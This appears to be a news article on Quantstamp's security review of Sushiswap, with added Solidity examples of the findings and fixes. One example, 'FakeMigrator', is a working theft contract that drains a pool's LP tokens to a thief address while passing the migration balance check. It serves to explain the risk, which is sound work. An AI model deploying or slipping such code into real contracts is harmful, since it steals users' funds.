Quantstamp issues Security Review on Sushiswap

Quantstamp reported 2 medium, 3 low and 5 informational findings in its security review of Sushiswap

Sep 4, 2020 · 8 min read


Smart contract security audit firm Quantstamp has published a security review report on Sushiswap, responding to the open invitation for security audits issued by Sushiswap's Chef Nomi.

In a tweet, Quantstamp highlighted the key risks it found in the Sushiswap protocol, categorised into three severity levels: medium, low and informational.

In total, it reported two medium, three low and five informational findings.

Firstly, Quantstamp found two medium-severity issues. The first is in add(), which does not prevent the same LP token from being added more than once; if the contract owner mistakenly adds the same LP token twice, the rewards associated with that token are reset. Quantstamp recommends keeping a mapping from LP token addresses to booleans, setting an address to true once its token has been added, and guarding add() with a require statement that rejects any LP token whose entry is already true.

The second medium-severity issue is that migrate() depends on a migrator contract that was unspecified at the time of the review. Whoever can set the migrator can point it at an arbitrary contract and use it to steal LPs' funds. This is especially dangerous if an attacker obtains the private key that controls that setting without its holder knowing.
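The two medium findings above, as an added illustration that is neither SushiSwap's contract nor code from Quantstamp's report: a trimmed-down MasterChef-style pool registry with the duplicate-LP-token check Quantstamp recommends, a migrate() function in the shape the review describes so that it is clear what the migrator is trusted with, and a hostile migrator showing why the post-migration balance check alone does not protect LPs. The delayed migrator change is my own suggested mitigation, not one attributed to Quantstamp. Names such as PoolRegistry, isLpTokenAdded, MIGRATOR_DELAY and FakeMigrator are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.6.12;

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// The migrator receives approval for the pool's whole LP balance and decides
// which token comes back, so whatever contract sits here is fully trusted.
interface IMigratorChef {
    function migrate(IERC20 token) external returns (IERC20);
}

// Illustrative, trimmed-down MasterChef-style pool registry (not SushiSwap's code).
contract PoolRegistry {
    struct PoolInfo { IERC20 lpToken; uint256 allocPoint; }

    address public owner;
    PoolInfo[] public poolInfo;
    uint256 public totalAllocPoint;

    // Recommended fix for the duplicate-add finding: remember every LP token
    // already registered so add() can refuse a second registration.
    mapping(address => bool) public isLpTokenAdded;

    // Assumed mitigation for the migrator finding (my suggestion): a migrator
    // change must be announced and only takes effect after a delay, giving
    // LPs time to withdraw if they do not trust the announced contract.
    uint256 public constant MIGRATOR_DELAY = 2 days;
    IMigratorChef public migrator;
    IMigratorChef public pendingMigrator;
    uint256 public migratorEffectiveAt;

    event MigratorProposed(address migrator, uint256 effectiveAt);

    constructor() public { owner = msg.sender; }

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }

    // Without the require below, the same LP token could be registered twice;
    // both pools would then read the same balanceOf(address(this)) and the
    // reward accounting for that token would be corrupted, as the review notes.
    function add(uint256 _allocPoint, IERC20 _lpToken) external onlyOwner {
        require(!isLpTokenAdded[address(_lpToken)], "add: LP token already added");
        isLpTokenAdded[address(_lpToken)] = true;
        totalAllocPoint += _allocPoint; // use SafeMath on 0.6.x in production code
        poolInfo.push(PoolInfo({lpToken: _lpToken, allocPoint: _allocPoint}));
    }

    function proposeMigrator(IMigratorChef _migrator) external onlyOwner {
        pendingMigrator = _migrator;
        migratorEffectiveAt = block.timestamp + MIGRATOR_DELAY;
        emit MigratorProposed(address(_migrator), migratorEffectiveAt);
    }

    function applyMigrator() external onlyOwner {
        require(address(pendingMigrator) != address(0), "no pending migrator");
        require(block.timestamp >= migratorEffectiveAt, "migrator delay not elapsed");
        migrator = pendingMigrator;
        pendingMigrator = IMigratorChef(address(0));
    }

    // Same shape as the pattern the review describes: the pool's entire LP
    // balance is handed to the migrator, and the only post-condition is that
    // the token the migrator chose to return reports an equal balance.
    function migrate(uint256 _pid) external {
        require(address(migrator) != address(0), "migrate: no migrator");
        PoolInfo storage pool = poolInfo[_pid];
        IERC20 lpToken = pool.lpToken;
        uint256 bal = lpToken.balanceOf(address(this));
        require(lpToken.approve(address(migrator), bal), "migrate: approve failed");
        IERC20 newLpToken = migrator.migrate(lpToken);
        require(bal == newLpToken.balanceOf(address(this)), "migrate: bad");
        pool.lpToken = newLpToken;
    }
}

// Why the balance check alone does not protect LPs: a hostile migrator can move
// the real LP tokens out and hand back a token of its own that reports the same
// number, which satisfies `bal == newLpToken.balanceOf(address(this))`.
contract FakeMigrator is IMigratorChef {
    address public thief;
    mapping(address => uint256) private claimed;

    constructor(address _thief) public { thief = _thief; }

    function migrate(IERC20 token) external override returns (IERC20) {
        uint256 bal = token.balanceOf(msg.sender);
        require(token.transferFrom(msg.sender, thief, bal), "pull failed"); // real LP tokens leave the pool
        claimed[msg.sender] = bal;                                          // "new" token mirrors the number
        return IERC20(address(this));
    }

    // Just enough ERC20 surface for the post-condition check to pass.
    function balanceOf(address account) external view returns (uint256) { return claimed[account]; }
}
```

The point of FakeMigrator is that migrate() verifies a quantity chosen by the very contract it is trusting; the only real protections are who can set the migrator and how much notice LPs get before a change takes effect.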

At the low-severity level, Quantstamp found three issues during its Sushiswap contract review. The first concerns devaddr, which it found receives about 9% of every SUSHI distribution rather than the 10% Sushiswap's documentation claims. The second is that _moveDelegates() may not behave correctly after token transfers. Quantstamp says it is not clear whether this is the intended behaviour, but recommends that Sushiswap provide adequate user documentation for it and consider invoking _moveDelegates() in _transfer(). It warns, however, that votes on Sushiswap may then be more easily "bought", since anyone can acquire SUSHI tokens on exchanges instead of mining them by providing liquidity. The third low-severity issue is massUpdatePools(), which loops over every pool and may run out of gas if too many pools are added.
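An added illustration of the two MasterChef-side low findings above (not SushiSwap's code and not code from the review): minting sushiReward/10 to devaddr on top of the full sushiReward gives devaddr 1/11 of everything minted (about 9.09%) rather than 10%, and the arithmetic that would be needed if 10% of the total is what the documentation means; below that, the linear loop behind the out-of-gas finding next to a bounded range-update alternative, which is my own suggestion rather than a recommendation attributed to Quantstamp. The _moveDelegates() finding concerns the token contract and is not shown here. Names such as Emission, mintDevShareOnTop, mintDevShareOfTotal, devShareBps and updatePoolRange are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.6.12;

interface ISushi {
    function mint(address to, uint256 amount) external;
}

// Illustrative reward-emission contract (not SushiSwap's MasterChef).
// Arithmetic is unchecked here for brevity; use SafeMath on 0.6.x in production.
contract Emission {
    struct PoolInfo {
        uint256 allocPoint;      // weight of this pool in the per-block emission
        uint256 lastRewardBlock; // last block at which this pool was updated
    }

    address public owner;
    ISushi public sushi;
    address public devaddr;
    uint256 public sushiPerBlock;
    uint256 public totalAllocPoint;
    PoolInfo[] public poolInfo;

    constructor(ISushi _sushi, address _devaddr, uint256 _sushiPerBlock) public {
        owner = msg.sender;
        sushi = _sushi;
        devaddr = _devaddr;
        sushiPerBlock = _sushiPerBlock;
    }

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }

    function add(uint256 _allocPoint) external onlyOwner {
        totalAllocPoint += _allocPoint;
        poolInfo.push(PoolInfo({allocPoint: _allocPoint, lastRewardBlock: block.number}));
    }

    // Shape the review describes: the dev share is minted ON TOP of the full
    // pool reward. Dev gets r/10 while the pool gets r, i.e. 1/11 of all new
    // SUSHI (~9.09%), not the 10% the documentation states.
    function mintDevShareOnTop(uint256 sushiReward) internal {
        sushi.mint(devaddr, sushiReward / 10);
        sushi.mint(address(this), sushiReward);
    }

    // If 10% of every distribution is the intended behaviour, the dev share
    // has to be carved out of the total instead.
    function mintDevShareOfTotal(uint256 sushiReward) internal {
        uint256 devShare = sushiReward / 10;
        sushi.mint(devaddr, devShare);
        sushi.mint(address(this), sushiReward - devShare);
    }

    // Dev share in basis points for a given split, so the two variants can be
    // compared without deploying a token: (1, 10) -> 909, (1, 9) -> 1000.
    function devShareBps(uint256 devAmount, uint256 poolAmount) public pure returns (uint256) {
        return devAmount * 10000 / (devAmount + poolAmount);
    }

    function updatePool(uint256 pid) public {
        PoolInfo storage pool = poolInfo[pid];
        if (block.number <= pool.lastRewardBlock || totalAllocPoint == 0) return;
        uint256 blocks = block.number - pool.lastRewardBlock;
        uint256 sushiReward = blocks * sushiPerBlock * pool.allocPoint / totalAllocPoint;
        mintDevShareOfTotal(sushiReward);
        pool.lastRewardBlock = block.number;
    }

    // Gas cost grows linearly with the number of pools: with enough pools this
    // single call no longer fits in a block, which is the out-of-gas finding.
    function massUpdatePools() external {
        for (uint256 pid = 0; pid < poolInfo.length; ++pid) {
            updatePool(pid);
        }
    }

    // Bounded alternative (my suggestion): callers update a slice [from, to)
    // across several transactions, so no single call depends on the pool count.
    function updatePoolRange(uint256 from, uint256 to) external {
        require(from < to && to <= poolInfo.length, "bad range");
        for (uint256 pid = from; pid < to; ++pid) {
            updatePool(pid);
        }
    }
}
```

Whichever split is kept, the documentation and the code should agree; the review's point is the mismatch between a stated 10% and an effective 1/11, not that either figure is wrong in itself.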

Finally, the five informational findings include emergencyWithdraw(), the consistency of privileged roles across contracts and missing constructor checks. Quantstamp published the full details of the review on its GitHub account.

A security review is not the same as an audit report.

Before anyone gets excited about Quantstamp finding no high-severity issues in its Sushiswap contract review, note the disclaimer it issued: a security review is not the same as a thorough smart contract audit. The firm points to its earlier review of the yEarn Finance platform, which the growing DeFi community found useful.

PeckShield, another smart contract security firm, also recently concluded a SushiSwap audit, as Chef Nomi, the anonymous Sushiswap creator, noted in one of his latest tweets.

At the time of writing, Sushiswap records almost $1.4 billion in total value locked (TVL), with SUSHI trading at $5.97.

[Image: Quantstamp security review Sushiswap. Source: Zippo]

Binance and OKEx are among the large exchanges that rushed to list SUSHI before any external security audit report was available. That is not how most large exchanges typically operate. Perhaps the DeFi boom is changing the landscape and prompting the big players to rethink their approach; clearly none of them wants to miss out on the hefty fees traders pay while trading their favourite DeFi tokens.

